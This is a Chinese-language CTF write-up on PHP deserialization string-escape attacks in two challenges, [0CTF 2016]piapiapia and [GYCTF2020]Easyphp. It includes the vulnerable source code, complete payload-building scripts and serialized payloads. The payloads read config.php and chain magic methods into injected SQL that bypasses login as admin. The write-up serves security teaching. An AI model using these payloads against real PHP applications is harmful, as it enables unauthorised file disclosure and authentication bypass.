php反序列化逃逸例题两道

本文只讲反序列化部分,不包含解题全部流程

1 [0CTF 2016]piapiapia

先看漏洞点

profile.php

<?php  
    require_once('class.php');  
    if($_SESSION['username'] == null) {  
       die('Login First');      
    }  
    $username = $_SESSION['username'];  
    $profile=$user->show_profile($username);  
    if($profile  == null) {  
       header('Location: update.php');  
    }  
    else {  
       $profile = unserialize($profile);  
       $phone = $profile['phone'];  
       $email = $profile['email'];  
       $nickname = $profile['nickname'];  
       $photo = base64_encode(file_get_contents($profile['photo']));  
?>  
<!DOCTYPE html>  
<html>  
<head>  
   <title>Profile</title>  
   <link href="static/bootstrap.min.css" rel="stylesheet">  
   <script src="static/jquery.min.js"></script>  
   <script src="static/bootstrap.min.js"></script>  
</head>  
<body>  
    <div class="container" style="margin-top:100px">    
<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">  
       <h3>Hi <?php echo $nickname;?></h3>  
       <label>Phone: <?php echo $phone;?></label>  
       <label>Email: <?php echo $email;?></label>  
    </div></body>  
</html>  
<?php  
    }  
?>

漏洞点在

$profile = unserialize($profile);
$photo = base64_encode(file_get_contents($profile['photo']));

文件读取了先前存储的被序列化后的内容
那么如何控制$profile['photo']?
跟进show_profile

public function show_profile($username) {  
    $username = parent::filter($username);  
  
    $where = "username = '$username'";  
    $object = parent::select($this->table, $where);  
    return $object->profile;  
}

跟进filte

public function filter($string) {  
    $escape = array('\'', '\\\\');  
    $escape = '/' . implode('|', $escape) . '/';  
    $string = preg_replace($escape, '_', $string);  
  
    $safe = array('select', 'insert', 'update', 'delete', 'where');  
    $safe = '/' . implode('|', $safe) . '/i';  
    return preg_replace($safe, 'hacker', $string);  
}

这里我们发现,如果把where替换为hacker会多一个字符,但这有什么用呢?
我们来看这段代码

<?php  
$profile['phone'] = 'phone';  
$profile['email'] = 'email';  
$profile['nickname'] = 'nickname';  
$profile['photo'] = 'photo';  
echo(serialize($profile));
# a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:8:"nickname";s:5:"photo";s:5:"photo";}

如果我们构造

<?php  
$profile['phone'] = 'phone';  
$profile['email'] = 'email';  
$profile['nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';  
$profile['photo'] = 'photo';  
  
echo(serialize($profile));  

#a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";s:5:"photo";s:5:"photo";}

在正常情况下,这没什么问题,但是在这道题目中where会被替换为hacker而多一个字符

{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";s:5:"photo";s:5:"photo";}
{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}

成为了一个新的合法整体控制了photo的值

2 [GYCTF2020]Easyphp

<?php  
error_reporting(0);  
session_start();  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
        $mysqli=new dbCtrl();  
        $this->id=$mysqli->login('select id,password from user where username=?');  
        if($this->id){  
        $_SESSION['id']=$this->id;  
        $_SESSION['login']=1;  
        echo "你的ID是".$_SESSION['id'];  
        echo "你好!".$_SESSION['token'];  
        echo "<script>window.location.href='./update.php'</script>";  
        return $this->id;  
        }  
    }  
}  
    public function update(){  
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        //这个功能还没有写完 先占坑  
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);//危  
    }  
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
    public function __construct($newInfo,$sql){  
        $newInfo=unserialize($newInfo);  
        $upDate=new dbCtrl();  
    }  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
    public function __construct()  
    {  
        $this->name=$_POST['username'];  
        $this->password=$_POST['password'];  
        $this->token=$_SESSION['token'];  
    }  
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        //还没来得及写  
    }  
}
<?php  
require_once('lib.php');  
echo '<html>  
<meta charset="utf-8">  
<title>update</title>  
<h2>这是一个未完成的页面,上线时建议删除本页面</h2>  
</html>';  
if ($_SESSION['login']!=1){  
    echo "你还没有登陆呢!";  
}  
$users=new User();  
$users->update();  
if($_SESSION['login']===1){  
    require_once("flag.php");  
    echo $flag;  
}  
  
?>

先构造反序列化链

<?php  
error_reporting(0);  
session_start();  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
            $mysqli=new dbCtrl();  
            $this->id=$mysqli->login('select id,password from user where username=?');  
            if($this->id){  
                $_SESSION['id']=$this->id;  
                $_SESSION['login']=1;  
                echo "你的ID是".$_SESSION['id'];  
                echo "你好!".$_SESSION['token'];  
                echo "<script>window.location.href='./update.php'</script>";  
                return $this->id;  
            }  
        }  
    }  
    public function update(){  
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        //这个功能还没有写完 先占坑  
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);//危  
    }  
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
  
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        //还没来得及写  
    }  
}  
  
  
$pop = new UpdateHelper();  
$pop->sql = new user(); # echo $this->sql;触发__toString()调用$this->nickname->update($this->age);
$pop->sql->age = 'select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?';  
/*  
 *`SELECT 1, "c4ca4238a0b923820dcc509a6f75849b" FROM user WHERE username=?` 查询时,无论 `?` 替换成什么有效的用户名,只要该用户名存在于 `user` 表中,这条查询都会返回 `1` 和 `"c4ca4238a0b923820dcc509a6f75849b"`。  
  
c4ca4238a0b923820dcc509a6f75849b是1的MD5  
### 返回值说明:  
- **常量 `1`**: 这个值在查询中是固定的,无论查询条件如何,它都不会改变。  
- **固定字符串 `c4ca4238a0b923820dcc509a6f75849b`**: 这也是一个固定的返回值,不会根据用户输入而变化。  
  
### 查询结果:  
- 如果 `username` 存在,查询将返回这两个值。  
- 如果 `username` 不存在,则查询不会返回任何行。  
 */
$pop->sql->nickname = new Info();  # 然后触发Info的__call->echo $this->CtrlCase->login($argument[0]); 
$pop->sql->nickname->CtrlCase = new dbCtrl();  
#形成dbCtrl->login('select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?')
$pop->sql->nickname->CtrlCase->name= 'admin';  
$pop->sql->nickname->CtrlCase->password = '1';  
  
echo(urlencode(serialize($pop)));
# O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}
<?php  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
  
  
$pop = new Info('1','1');  
  
echo(urlencode(serialize($pop)));

# O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1:"1";s:8:"CtrlCase";N;}
<?php  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
  
  
$pop = new Info('1','unionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunion";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}');  
  
echo(urlencode(serialize($pop)));
#O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"unionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunion";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}

union会被替换为hacker,多了一个字符会变成

O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}

hacker的数量正好会变成1578个,导致原来被作为字符串的";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}
被解析造成逃逸